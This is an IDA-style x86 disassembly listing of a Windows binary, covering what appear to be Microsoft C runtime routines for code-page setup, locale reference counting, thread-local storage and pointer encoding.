		cmp	dword_4244A0[eax], edi
		jz	short loc_405129
		inc	[ebp+var_1C]
		add	eax, 30h
		cmp	eax, 0F0h
		jb	short loc_4050BA
		lea	eax, [ebp+var_18]
		push	eax
		push	edi
		call	ds:dword_41E1B4	; GetCPInfo
		test	eax, eax
		jz	loc_40520B
		push	101h
		lea	eax, [ebx+1Ch]
		push	esi
		push	eax
		call	sub_408130
		xor	edx, edx
		inc	edx
		add	esp, 0Ch
		cmp	[ebp+var_18], edx
		mov	[ebx+4], edi
		mov	[ebx+0Ch], esi
		jbe	loc_4051FE
		cmp	[ebp+var_12], 0
		jz	loc_4051DF
		lea	esi, [ebp+var_11]

loc_405113:				; CODE XREF: sub_40507E+15Bj
		mov	cl, [esi]
		test	cl, cl
		jz	loc_4051DF
		movzx	eax, byte ptr [esi-1]
		movzx	ecx, cl
		jmp	loc_4051CF
; ---------------------------------------------------------------------------

loc_405129:				; CODE XREF: sub_40507E+42j
		push	101h
		lea	eax, [ebx+1Ch]
		push	esi
		push	eax
		call	sub_408130
		mov	ecx, [ebp+var_1C]
		add	esp, 0Ch
		imul	ecx, 30h
		mov	[ebp+var_20], esi
		lea	esi, dword_4244B0[ecx]
		mov	[ebp+var_1C], esi
		jmp	short loc_405179
; ---------------------------------------------------------------------------

loc_40514F:				; CODE XREF: sub_40507E+FEj
		mov	al, [esi+1]
		test	al, al
		jz	short loc_40517E
		movzx	edi, byte ptr [esi]
		movzx	eax, al
		jmp	short loc_405170
; ---------------------------------------------------------------------------

loc_40515E:				; CODE XREF: sub_40507E+F4j
		mov	eax, [ebp+var_20]
		mov	al, byte_42449C[eax]
		or	[ebx+edi+1Dh], al
		movzx	eax, byte ptr [esi+1]
		inc	edi

loc_405170:				; CODE XREF: sub_40507E+DEj
		cmp	edi, eax
		jbe	short loc_40515E
		mov	edi, [ebp+arg_0]
		inc	esi
		inc	esi

loc_405179:				; CODE XREF: sub_40507E+CFj
					; sub_40507E+110j
		cmp	byte ptr [esi],	0
		jnz	short loc_40514F

loc_40517E:				; CODE XREF: sub_40507E+D6j
		mov	esi, [ebp+var_1C]
		inc	[ebp+var_20]
		add	esi, 8
		cmp	[ebp+var_20], 4
		mov	[ebp+var_1C], esi
		jb	short loc_405179
		mov	eax, edi
		mov	[ebx+4], edi
		mov	dword ptr [ebx+8], 1
		call	sub_404D52
		push	6
		mov	[ebx+0Ch], eax
		lea	eax, [ebx+10h]
		lea	ecx, dword_4244A4[ecx]
		pop	edx

loc_4051B0:				; CODE XREF: sub_40507E+13Dj
		mov	si, [ecx]
		inc	ecx
		mov	[eax], si
		inc	ecx
		inc	eax
		inc	eax
		dec	edx
		jnz	short loc_4051B0

loc_4051BD:				; CODE XREF: sub_40507E+18Bj
		mov	esi, ebx
		call	sub_404DD6
		jmp	loc_4050AE
; ---------------------------------------------------------------------------

loc_4051C9:				; CODE XREF: sub_40507E+153j
		or	byte ptr [ebx+eax+1Dh],	4
		inc	eax

loc_4051CF:				; CODE XREF: sub_40507E+A6j
		cmp	eax, ecx
		jbe	short loc_4051C9
		inc	esi
		inc	esi
		cmp	byte ptr [esi-1], 0
		jnz	loc_405113

loc_4051DF:				; CODE XREF: sub_40507E+8Cj
					; sub_40507E+99j
		lea	eax, [ebx+1Eh]
		mov	ecx, 0FEh

loc_4051E7:				; CODE XREF: sub_40507E+16Ej
		or	byte ptr [eax],	8
		inc	eax
		dec	ecx
		jnz	short loc_4051E7
		mov	eax, [ebx+4]
		call	sub_404D52
		mov	[ebx+0Ch], eax
		mov	[ebx+8], edx
		jmp	short loc_405201
; ---------------------------------------------------------------------------

loc_4051FE:				; CODE XREF: sub_40507E+82j
		mov	[ebx+8], esi

loc_405201:				; CODE XREF: sub_40507E+17Ej
		xor	eax, eax
		lea	edi, [ebx+10h]
		stosd
		stosd
		stosd
		jmp	short loc_4051BD
; ---------------------------------------------------------------------------

loc_40520B:				; CODE XREF: sub_40507E+5Ej
		cmp	dword_4288E4, esi
		jnz	loc_4050A7
		or	eax, 0FFFFFFFFh

loc_40521A:				; CODE XREF: sub_40507E+32j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_40507E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405229	proc near		; CODE XREF: sub_4053C3+Bp

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00405395 SIZE 0000002E BYTES

		push	14h
		push	offset dword_4229A0
		call	__SEH_prolog4
		or	[ebp+var_20], 0FFFFFFFFh
		call	sub_40595D
		mov	edi, eax
		mov	[ebp+var_24], edi
		call	sub_404F60
		mov	ebx, [edi+68h]
		mov	esi, [ebp+arg_0]
		call	sub_405004
		mov	[ebp+arg_0], eax
		cmp	eax, [ebx+4]
		jz	loc_4053B6
		push	220h
		call	sub_407CFA
		pop	ecx
		mov	ebx, eax
		test	ebx, ebx
		jz	loc_4053BA
		mov	ecx, 88h
		mov	esi, [edi+68h]
		mov	edi, ebx
		rep movsd
		and	dword ptr [ebx], 0
		push	ebx
		push	[ebp+arg_0]
		call	sub_40507E
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		test	eax, eax
		jnz	loc_405395
		mov	esi, [ebp+var_24]
		push	dword ptr [esi+68h]
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_4052BA
		mov	eax, [esi+68h]
		cmp	eax, offset dword_424070
		jz	short loc_4052BA
		push	eax
		call	sub_403B91
		pop	ecx

loc_4052BA:				; CODE XREF: sub_405229+7Ej
					; sub_405229+88j
		mov	[esi+68h], ebx
		push	ebx
		mov	edi, ds:dword_41E1B8
		call	edi	; InterlockedIncrement
		test	byte ptr [esi+70h], 2
		jnz	loc_4053BA
		test	byte ptr dword_424594, 1
		jnz	loc_4053BA
		push	0Dh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	eax, [ebx+4]
		mov	dword_4288F4, eax
		mov	eax, [ebx+8]
		mov	dword_4288F8, eax
		mov	eax, [ebx+0Ch]
		mov	dword_4288FC, eax
		xor	eax, eax

loc_405303:				; CODE XREF: sub_405229+F0j
		mov	[ebp+var_1C], eax
		cmp	eax, 5
		jge	short loc_40531B
		mov	cx, [ebx+eax*2+10h]
		mov	word_4288E8[eax*2], cx
		inc	eax
		jmp	short loc_405303
; ---------------------------------------------------------------------------

loc_40531B:				; CODE XREF: sub_405229+E0j
		xor	eax, eax

loc_40531D:				; CODE XREF: sub_405229+109j
		mov	[ebp+var_1C], eax
		cmp	eax, 101h
		jge	short loc_405334
		mov	cl, [eax+ebx+1Ch]
		mov	byte_424290[eax], cl
		inc	eax
		jmp	short loc_40531D
; ---------------------------------------------------------------------------

loc_405334:				; CODE XREF: sub_405229+FCj
		xor	eax, eax

loc_405336:				; CODE XREF: sub_405229+125j
		mov	[ebp+var_1C], eax
		cmp	eax, 100h
		jge	short loc_405350
		mov	cl, [eax+ebx+11Dh]
		mov	byte_424398[eax], cl
		inc	eax
		jmp	short loc_405336
; ---------------------------------------------------------------------------

loc_405350:				; CODE XREF: sub_405229+115j
		push	dword_424498
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_405373
		mov	eax, dword_424498
		cmp	eax, offset dword_424070
		jz	short loc_405373
		push	eax
		call	sub_403B91
		pop	ecx

loc_405373:				; CODE XREF: sub_405229+135j
					; sub_405229+141j
		mov	dword_424498, ebx
		push	ebx
		call	edi	; InterlockedIncrement
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40538A
		jmp	short loc_4053BA
sub_405229	endp


; =============== S U B	R O U T	I N E =======================================



sub_40538A	proc near		; CODE XREF: sub_405229+15Ap
					; DATA XREF: zcrshv4o:004229B8o
		push	0Dh
		call	sub_405EDF
		pop	ecx
		retn
sub_40538A	endp

; ---------------------------------------------------------------------------
		jmp	short loc_4053BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_405229

loc_405395:				; CODE XREF: sub_405229+6Aj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4053BA
		cmp	ebx, offset dword_424070
		jz	short loc_4053A9
		push	ebx
		call	sub_403B91
		pop	ecx

loc_4053A9:				; CODE XREF: sub_405229+177j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		jmp	short loc_4053BA
; ---------------------------------------------------------------------------

loc_4053B6:				; CODE XREF: sub_405229+30j
		and	[ebp+var_20], 0

loc_4053BA:				; CODE XREF: sub_405229+45j
					; sub_405229+A1j ...
		mov	eax, [ebp+var_20]
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_405229

; =============== S U B	R O U T	I N E =======================================



sub_4053C3	proc near		; CODE XREF: sub_40B144+Cp
					; sub_40B1A1+Dp ...
		cmp	dword_438FF4, 0
		jnz	short loc_4053DE
		push	0FFFFFFFDh
		call	sub_405229
		pop	ecx
		mov	dword_438FF4, 1

loc_4053DE:				; CODE XREF: sub_4053C3+7j
		xor	eax, eax
		retn
sub_4053C3	endp


; =============== S U B	R O U T	I N E =======================================



sub_4053E1	proc near		; CODE XREF: sub_405633+31p
					; sub_405975+E8p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_0]
		mov	eax, [esi+0BCh]
		xor	ebp, ebp
		cmp	eax, ebp
		push	edi
		jz	short loc_405464
		cmp	eax, offset off_424F38
		jz	short loc_405464
		mov	eax, [esi+0B0h]
		cmp	eax, ebp
		jz	short loc_405464
		cmp	[eax], ebp
		jnz	short loc_405464
		mov	eax, [esi+0B8h]
		cmp	eax, ebp
		jz	short loc_40542B
		cmp	[eax], ebp
		jnz	short loc_40542B
		push	eax
		call	sub_403B91
		push	dword ptr [esi+0BCh]
		call	sub_40CCC4
		pop	ecx
		pop	ecx

loc_40542B:				; CODE XREF: sub_4053E1+31j
					; sub_4053E1+35j
		mov	eax, [esi+0B4h]
		cmp	eax, ebp
		jz	short loc_40544C
		cmp	[eax], ebp
		jnz	short loc_40544C
		push	eax
		call	sub_403B91
		push	dword ptr [esi+0BCh]
		call	sub_40CC84
		pop	ecx
		pop	ecx

loc_40544C:				; CODE XREF: sub_4053E1+52j
					; sub_4053E1+56j
		push	dword ptr [esi+0B0h]
		call	sub_403B91
		push	dword ptr [esi+0BCh]
		call	sub_403B91
		pop	ecx
		pop	ecx

loc_405464:				; CODE XREF: sub_4053E1+12j
					; sub_4053E1+19j ...
		mov	eax, [esi+0C0h]
		cmp	eax, ebp
		jz	short loc_4054B2
		cmp	[eax], ebp
		jnz	short loc_4054B2
		mov	eax, [esi+0C4h]
		sub	eax, 0FEh
		push	eax
		call	sub_403B91
		mov	eax, [esi+0CCh]
		mov	edi, 80h
		sub	eax, edi
		push	eax
		call	sub_403B91
		mov	eax, [esi+0D0h]
		sub	eax, edi
		push	eax
		call	sub_403B91
		push	dword ptr [esi+0C0h]
		call	sub_403B91
		add	esp, 10h

loc_4054B2:				; CODE XREF: sub_4053E1+8Bj
					; sub_4053E1+8Fj
		lea	edi, [esi+0D4h]
		mov	eax, [edi]
		cmp	eax, offset off_424E78
		jz	short loc_4054D8
		cmp	[eax+0B4h], ebp
		jnz	short loc_4054D8
		push	eax
		call	sub_40CAF4
		push	dword ptr [edi]
		call	sub_403B91
		pop	ecx
		pop	ecx

loc_4054D8:				; CODE XREF: sub_4053E1+DEj
					; sub_4053E1+E6j
		push	6
		lea	edi, [esi+50h]
		pop	ebx

loc_4054DE:				; CODE XREF: sub_4053E1+132j
		cmp	dword ptr [edi-8], offset dword_424598
		jz	short loc_4054F8
		mov	eax, [edi]
		cmp	eax, ebp
		jz	short loc_4054F8
		cmp	[eax], ebp
		jnz	short loc_4054F8
		push	eax
		call	sub_403B91
		pop	ecx

loc_4054F8:				; CODE XREF: sub_4053E1+104j
					; sub_4053E1+10Aj ...
		cmp	[edi-4], ebp
		jz	short loc_40550F
		mov	eax, [edi+4]
		cmp	eax, ebp
		jz	short loc_40550F
		cmp	[eax], ebp
		jnz	short loc_40550F
		push	eax
		call	sub_403B91
		pop	ecx

loc_40550F:				; CODE XREF: sub_4053E1+11Aj
					; sub_4053E1+121j ...
		add	edi, 10h
		dec	ebx
		jnz	short loc_4054DE
		push	esi
		call	sub_403B91
		pop	ecx
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_4053E1	endp


; =============== S U B	R O U T	I N E =======================================



sub_405521	proc near		; CODE XREF: sub_405633+12p
					; sub_405826+93p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_0]
		push	edi
		mov	edi, ds:dword_41E1B8
		push	esi
		call	edi	; InterlockedIncrement
		mov	eax, [esi+0B0h]
		test	eax, eax
		jz	short loc_40553F
		push	eax
		call	edi	; InterlockedIncrement

loc_40553F:				; CODE XREF: sub_405521+19j
		mov	eax, [esi+0B8h]
		test	eax, eax
		jz	short loc_40554C
		push	eax
		call	edi	; InterlockedIncrement

loc_40554C:				; CODE XREF: sub_405521+26j
		mov	eax, [esi+0B4h]
		test	eax, eax
		jz	short loc_405559
		push	eax
		call	edi	; InterlockedIncrement

loc_405559:				; CODE XREF: sub_405521+33j
		mov	eax, [esi+0C0h]
		test	eax, eax
		jz	short loc_405566
		push	eax
		call	edi	; InterlockedIncrement

loc_405566:				; CODE XREF: sub_405521+40j
		push	6
		lea	ebx, [esi+50h]
		pop	ebp

loc_40556C:				; CODE XREF: sub_405521+71j
		cmp	dword ptr [ebx-8], offset dword_424598
		jz	short loc_40557E
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_40557E
		push	eax
		call	edi	; InterlockedIncrement

loc_40557E:				; CODE XREF: sub_405521+52j
					; sub_405521+58j
		cmp	dword ptr [ebx-4], 0
		jz	short loc_40558E
		mov	eax, [ebx+4]
		test	eax, eax
		jz	short loc_40558E
		push	eax
		call	edi	; InterlockedIncrement

loc_40558E:				; CODE XREF: sub_405521+61j
					; sub_405521+68j
		add	ebx, 10h
		dec	ebp
		jnz	short loc_40556C
		mov	eax, [esi+0D4h]
		add	eax, 0B4h
		push	eax
		call	edi	; InterlockedIncrement
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_405521	endp


; =============== S U B	R O U T	I N E =======================================



sub_4055A7	proc near		; CODE XREF: sub_405633+1Dp
					; sub_405975+CCp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40562F
		push	ebx
		push	ebp
		push	edi
		mov	edi, ds:dword_41E18C
		push	esi
		call	edi	; InterlockedDecrement
		mov	eax, [esi+0B0h]
		test	eax, eax
		jz	short loc_4055C9
		push	eax
		call	edi	; InterlockedDecrement

loc_4055C9:				; CODE XREF: sub_4055A7+1Dj
		mov	eax, [esi+0B8h]
		test	eax, eax
		jz	short loc_4055D6
		push	eax
		call	edi	; InterlockedDecrement

loc_4055D6:				; CODE XREF: sub_4055A7+2Aj
		mov	eax, [esi+0B4h]
		test	eax, eax
		jz	short loc_4055E3
		push	eax
		call	edi	; InterlockedDecrement

loc_4055E3:				; CODE XREF: sub_4055A7+37j
		mov	eax, [esi+0C0h]
		test	eax, eax
		jz	short loc_4055F0
		push	eax
		call	edi	; InterlockedDecrement

loc_4055F0:				; CODE XREF: sub_4055A7+44j
		push	6
		lea	ebx, [esi+50h]
		pop	ebp

loc_4055F6:				; CODE XREF: sub_4055A7+75j
		cmp	dword ptr [ebx-8], offset dword_424598
		jz	short loc_405608
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_405608
		push	eax
		call	edi	; InterlockedDecrement

loc_405608:				; CODE XREF: sub_4055A7+56j
					; sub_4055A7+5Cj
		cmp	dword ptr [ebx-4], 0
		jz	short loc_405618
		mov	eax, [ebx+4]
		test	eax, eax
		jz	short loc_405618
		push	eax
		call	edi	; InterlockedDecrement

loc_405618:				; CODE XREF: sub_4055A7+65j
					; sub_4055A7+6Cj
		add	ebx, 10h
		dec	ebp
		jnz	short loc_4055F6
		mov	eax, [esi+0D4h]
		add	eax, 0B4h
		push	eax
		call	edi	; InterlockedDecrement
		pop	edi
		pop	ebp
		pop	ebx

loc_40562F:				; CODE XREF: sub_4055A7+7j
		mov	eax, esi
		pop	esi
		retn
sub_4055A7	endp


; =============== S U B	R O U T	I N E =======================================



sub_405633	proc near		; CODE XREF: sub_405671+54p
		test	edi, edi
		jz	short loc_40566E
		test	eax, eax
		jz	short loc_40566E
		push	esi
		mov	esi, [eax]
		cmp	esi, edi
		jz	short loc_40566A
		push	edi
		mov	[eax], edi
		call	sub_405521
		test	esi, esi
		pop	ecx
		jz	short loc_40566A
		push	esi
		call	sub_4055A7
		cmp	dword ptr [esi], 0
		pop	ecx
		jnz	short loc_40566A
		cmp	esi, offset dword_4245A0
		jz	short loc_40566A
		push	esi
		call	sub_4053E1
		pop	ecx

loc_40566A:				; CODE XREF: sub_405633+Dj
					; sub_405633+1Aj ...
		mov	eax, edi
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40566E:				; CODE XREF: sub_405633+2j
					; sub_405633+6j
		xor	eax, eax
		retn
sub_405633	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405671	proc near		; CODE XREF: sub_402CAD+37p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_4229C0
		call	__SEH_prolog4
		call	sub_40595D
		mov	esi, eax
		mov	eax, dword_424594
		test	[esi+70h], eax
		jz	short loc_4056B0
		cmp	dword ptr [esi+6Ch], 0
		jz	short loc_4056B0
		call	sub_40595D
		mov	esi, [eax+6Ch]

loc_40569C:				; CODE XREF: sub_405671+68j
		test	esi, esi
		jnz	short loc_4056A8
		push	20h
		call	sub_407E1D
		pop	ecx

loc_4056A8:				; CODE XREF: sub_405671+2Dj
		mov	eax, esi
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_4056B0:				; CODE XREF: sub_405671+1Bj
					; sub_405671+21j
		push	0Ch
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		lea	eax, [esi+6Ch]
		mov	edi, off_424678
		call	sub_405633
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4056DB
		jmp	short loc_40569C
sub_405671	endp


; =============== S U B	R O U T	I N E =======================================



sub_4056DB	proc near		; CODE XREF: sub_405671+63p
					; DATA XREF: zcrshv4o:004229D8o
		push	0Ch
		call	sub_405EDF
		pop	ecx
		mov	esi, [ebp-1Ch]
		retn
sub_4056DB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4056E7	proc near		; CODE XREF: sub_403297+81p
					; sub_403297+96p ...

arg_0		= dword	ptr  4

		push	esi
		push	dword_42468C
		mov	esi, ds:dword_41E180
		call	esi	; TlsGetValue
		test	eax, eax
		jz	short loc_40571B
		mov	eax, dword_424688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40571B
		push	eax
		push	dword_42468C
		call	esi	; TlsGetValue
		call	eax
		test	eax, eax
		jz	short loc_40571B
		mov	eax, [eax+1F8h]
		jmp	short loc_405736
; ---------------------------------------------------------------------------

loc_40571B:				; CODE XREF: sub_4056E7+11j
					; sub_4056E7+1Bj ...
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_405744
		push	offset aEncodepointer ;	"EncodePointer"
		push	eax
		call	ds:off_41E0E8

loc_405736:				; CODE XREF: sub_4056E7+32j
		test	eax, eax
		jz	short loc_405744
		push	[esp+4+arg_0]
		call	eax
		mov	[esp+4+arg_0], eax

loc_405744:				; CODE XREF: sub_4056E7+41j
					; sub_4056E7+51j
		mov	eax, [esp+4+arg_0]
		pop	esi
		retn
sub_4056E7	endp


; =============== S U B	R O U T	I N E =======================================



sub_40574A	proc near		; CODE XREF: sub_4080D9+1p
					; sub_40BED5+2Fp ...
		push	0
		call	sub_4056E7
		pop	ecx
		retn
sub_40574A	endp


; =============== S U B	R O U T	I N E =======================================



sub_405753	proc near		; CODE XREF: sub_403297+Bp
					; sub_403297+1Cp ...

arg_0		= dword	ptr  4

		push	esi
		push	dword_42468C
		mov	esi, ds:dword_41E180
		call	esi	; TlsGetValue
		test	eax, eax
		jz	short loc_405787
		mov	eax, dword_424688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405787
		push	eax
		push	dword_42468C
		call	esi	; TlsGetValue
		call	eax
		test	eax, eax
		jz	short loc_405787
		mov	eax, [eax+1FCh]
		jmp	short loc_4057A2
; ---------------------------------------------------------------------------

loc_405787:				; CODE XREF: sub_405753+11j
					; sub_405753+1Bj ...
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_4057B0
		push	offset aDecodepointer ;	"DecodePointer"
		push	eax
		call	ds:off_41E0E8

loc_4057A2:				; CODE XREF: sub_405753+32j
		test	eax, eax
		jz	short loc_4057B0
		push	[esp+4+arg_0]
		call	eax
		mov	[esp+4+arg_0], eax

loc_4057B0:				; CODE XREF: sub_405753+41j
					; sub_405753+51j
		mov	eax, [esp+4+arg_0]
		pop	esi
		retn
sub_405753	endp


; =============== S U B	R O U T	I N E =======================================



sub_4057B6	proc near		; DATA XREF: sub_405A96+8Ao
					; .data:off_428924o
		call	ds:dword_41E17C	; TlsAlloc
		retn	4
sub_4057B6	endp


; =============== S U B	R O U T	I N E =======================================



sub_4057BF	proc near		; CODE XREF: sub_4058DA+Ap
		push	dword_42468C
		call	ds:dword_41E180	; TlsGetValue
		test	eax, eax
		jnz	short locret_4057E8
		push	off_428928
		call	sub_405753
		pop	ecx
		push	eax
		push	dword_42468C
		call	ds:dword_41E178	; TlsSetValue

locret_4057E8:				; CODE XREF: sub_4057BF+Ej
		retn
sub_4057BF	endp


; =============== S U B	R O U T	I N E =======================================



sub_4057E9	proc near		; CODE XREF: sub_405A96+12p
					; sub_405A96:loc_405C10p
		mov	eax, dword_424688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405809
		push	eax
		push	off_428930
		call	sub_405753
		pop	ecx
		call	eax
		or	dword_424688, 0FFFFFFFFh

loc_405809:				; CODE XREF: sub_4057E9+8j
		mov	eax, dword_42468C
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405821
		push	eax
		call	ds:off_41E174
		or	dword_42468C, 0FFFFFFFFh

loc_405821:				; CODE XREF: sub_4057E9+28j
		jmp	sub_405E8A
sub_4057E9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405826	proc near		; CODE XREF: sub_4058DA+59p
					; sub_405A96+162p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	0Ch
		push	offset dword_4229E0
		call	__SEH_prolog4
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		mov	[ebp+var_1C], eax
		mov	esi, [ebp+arg_0]
		mov	dword ptr [esi+5Ch], offset dword_424DC0
		xor	edi, edi
		inc	edi
		mov	[esi+14h], edi
		test	eax, eax
		jz	short loc_405878
		push	offset aEncodepointer ;	"EncodePointer"
		push	eax
		mov	ebx, ds:off_41E0E8
		call	ebx ; sub_45000F
		mov	[esi+1F8h], eax
		push	offset aDecodepointer ;	"DecodePointer"
		push	[ebp+var_1C]
		call	ebx ; sub_45000F
		mov	[esi+1FCh], eax

loc_405878:				; CODE XREF: sub_405826+2Cj
		mov	[esi+70h], edi
		mov	byte ptr [esi+0C8h], 43h
		mov	byte ptr [esi+14Bh], 43h
		mov	eax, offset dword_424070
		mov	[esi+68h], eax
		push	eax
		call	ds:dword_41E1B8	; InterlockedIncrement
		push	0Ch
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	eax, [ebp+arg_4]
		mov	[esi+6Ch], eax
		test	eax, eax
		jnz	short loc_4058B6
		mov	eax, off_424678
		mov	[esi+6Ch], eax

loc_4058B6:				; CODE XREF: sub_405826+86j
		push	dword ptr [esi+6Ch]
		call	sub_405521
		pop	ecx
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4058D1
		call	__SEH_epilog4
		retn
sub_405826	endp


; =============== S U B	R O U T	I N E =======================================



sub_4058D1	proc near		; CODE XREF: sub_405826+A0p
					; DATA XREF: zcrshv4o:004229F8o
		push	0Ch
		call	sub_405EDF
		pop	ecx
		retn
sub_4058D1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4058DA	proc near		; CODE XREF: sub_40595D+1p sub_405D93p ...
		push	esi
		push	edi
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	edi, eax
		call	sub_4057BF
		push	dword_424688
		push	dword_42468C
		call	ds:dword_41E180	; TlsGetValue
		call	eax
		mov	esi, eax
		test	esi, esi
		jnz	short loc_405951
		push	214h
		push	1
		call	sub_407D3A
		mov	esi, eax
		test	esi, esi
		pop	ecx
		pop	ecx
		jz	short loc_405951
		push	esi
		push	dword_424688
		push	off_42892C
		call	sub_405753
		pop	ecx
		call	eax
		test	eax, eax
		jz	short loc_405948
		push	0
		push	esi
		call	sub_405826
		pop	ecx
		pop	ecx
		call	ds:dword_41E0DC	; GetCurrentThreadId
		or	dword ptr [esi+4], 0FFFFFFFFh
		mov	[esi], eax
		jmp	short loc_405951
; ---------------------------------------------------------------------------

loc_405948:				; CODE XREF: sub_4058DA+54j
		push	esi
		call	sub_403B91
		pop	ecx
		xor	esi, esi

loc_405951:				; CODE XREF: sub_4058DA+27j
					; sub_4058DA+3Bj ...
		push	edi
		call	ds:dword_41E170	; RtlRestoreLastWin32Error
		pop	edi
		mov	eax, esi
		pop	esi
		retn
sub_4058DA	endp


; =============== S U B	R O U T	I N E =======================================



sub_40595D	proc near		; CODE XREF: sub_402CAD+Fp sub_4038E4p ...
		push	esi
		call	sub_4058DA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_405971
		push	10h
		call	sub_407E1D
		pop	ecx

loc_405971:				; CODE XREF: sub_40595D+Aj
		mov	eax, esi
		pop	esi
		retn
sub_40595D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405975	proc near		; DATA XREF: sub_405A96+115o

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422A00
		call	__SEH_prolog4
		mov	esi, [ebp+arg_0]
		test	esi, esi
		jz	loc_405A76
		mov	eax, [esi+24h]
		test	eax, eax
		jz	short loc_40599A
		push	eax
		call	sub_403B91
		pop	ecx

loc_40599A:				; CODE XREF: sub_405975+1Cj
		mov	eax, [esi+2Ch]
		test	eax, eax
		jz	short loc_4059A8
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059A8:				; CODE XREF: sub_405975+2Aj
		mov	eax, [esi+34h]
		test	eax, eax
		jz	short loc_4059B6
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059B6:				; CODE XREF: sub_405975+38j
		mov	eax, [esi+3Ch]
		test	eax, eax
		jz	short loc_4059C4
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059C4:				; CODE XREF: sub_405975+46j
		mov	eax, [esi+44h]
		test	eax, eax
		jz	short loc_4059D2
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059D2:				; CODE XREF: sub_405975+54j
		mov	eax, [esi+48h]
		test	eax, eax
		jz	short loc_4059E0
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059E0:				; CODE XREF: sub_405975+62j
		mov	eax, [esi+5Ch]
		cmp	eax, offset dword_424DC0
		jz	short loc_4059F1
		push	eax
		call	sub_403B91
		pop	ecx

loc_4059F1:				; CODE XREF: sub_405975+73j
		push	0Dh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	edi, [esi+68h]
		test	edi, edi
		jz	short loc_405A1E
		push	edi
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_405A1E
		cmp	edi, offset dword_424070
		jz	short loc_405A1E
		push	edi
		call	sub_403B91
		pop	ecx

loc_405A1E:				; CODE XREF: sub_405975+8Dj
					; sub_405975+98j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405A81
		push	0Ch
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], 1
		mov	edi, [esi+6Ch]
		test	edi, edi
		jz	short loc_405A63
		push	edi
		call	sub_4055A7
		pop	ecx
		cmp	edi, off_424678
		jz	short loc_405A63
		cmp	edi, offset dword_4245A0
		jz	short loc_405A63
		cmp	dword ptr [edi], 0
		jnz	short loc_405A63
		push	edi
		call	sub_4053E1
		pop	ecx

loc_405A63:				; CODE XREF: sub_405975+C9j
					; sub_405975+D8j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405A8D
		push	esi
		call	sub_403B91
		pop	ecx

loc_405A76:				; CODE XREF: sub_405975+11j
		call	__SEH_epilog4
		retn	4
sub_405975	endp


; =============== S U B	R O U T	I N E =======================================



sub_405A7E	proc near		; DATA XREF: zcrshv4o:00422A18o
		mov	esi, [ebp+8]
sub_405A7E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_405A81	proc near		; CODE XREF: sub_405975+B0p
		push	0Dh
		call	sub_405EDF
		pop	ecx
		retn
sub_405A81	endp


